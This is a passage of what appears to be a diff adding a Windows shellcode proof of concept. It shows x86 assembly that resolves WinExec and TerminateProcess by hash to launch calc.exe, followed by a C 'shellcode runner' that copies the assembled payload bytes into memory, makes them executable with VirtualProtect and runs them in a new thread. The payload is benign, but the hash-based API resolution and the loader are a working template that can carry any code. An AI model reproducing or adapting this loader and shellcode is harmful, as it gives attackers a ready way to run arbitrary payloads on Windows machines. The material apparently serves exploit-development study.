AddressOfFunctions RVA + add edx, ebx ; AddressOfFunctions VMA + mov eax, [edx+4*ecx] ; Get the function RVA + add eax, ebx ; Get the function VMA + mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad + + find_function_finished: + popad ; Restore registers + ret ; + + resolve_symbols_kernel32: + push 0xe8afe98 ; WinExec hash + call dword ptr [ebp+0x04] ; Call find_function + mov [ebp+0x10], eax ; Save WinExec address for later usage + push 0x78b5b983 ; TerminateProcess hash + call dword ptr [ebp+0x04] ; Call find_function + mov [ebp+0x14], eax ; Save TerminateProcess address for later usage + + create_calc_string: + xor eax, eax ; EAX = null + push eax ; Push null-terminated string + push dword 0x6578652e ; + push dword 0x636c6163 ; + push esp ; ESP = &(lpCmdLine) + pop ebx ; EBX save pointer to string + + ; UINT WinExec( + ; LPCSTR lpCmdLine, -> EBX + ; UINT uCmdShow -> EAX + ; ); + + call_winexec: + xor eax, eax ; EAX = null + push eax ; uCmdShow + push ebx ; lpCmdLine + call dword ptr [ebp+0x10] ; Call WinExec + + ; BOOL TerminateProcess( + ; HANDLE hProcess, -> 0xffffffff + ; UINT uExitCode -> EAX + ; ); + + terminate_process: + xor eax, eax ; EAX = null + push eax ; uExitCode + push 0xffffffff ; hProcess + call dword ptr [ebp+0x14] ; Call TerminateProcess + + +[!]===================================== POC ========================================= [!] + +/* + + Shellcode runner author: reenz0h (twitter: @sektor7net) + +*/ +#include +#include +#include +#include + +// Our WinExec PopCalc shellcode + +unsigned char payload[] = +"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e" +"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43" +"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b" +"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75" +"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61" +"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0" +"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff" +"\xff\x55\x14"; + + +unsigned int payload_len = 178; + +int main(void) { + + void * exec_mem; + BOOL rv; + HANDLE th; + DWORD oldprotect = 0; + + // Allocate a memory buffer for payload + exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + + // Copy payload to new buffer + RtlMoveMemory(exec_mem, payload, payload_len); + + // Make new buffer as executable + rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); + + printf("\nHit me!\n"); + printf("Shellcode Length: %d\n", strlen(payload)); + getchar(); + + // If all good, run the payload + if ( rv != 0 ) { + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); + WaitForSingleObject(th, -1); + } + + return 0; +} \ No newline at end of file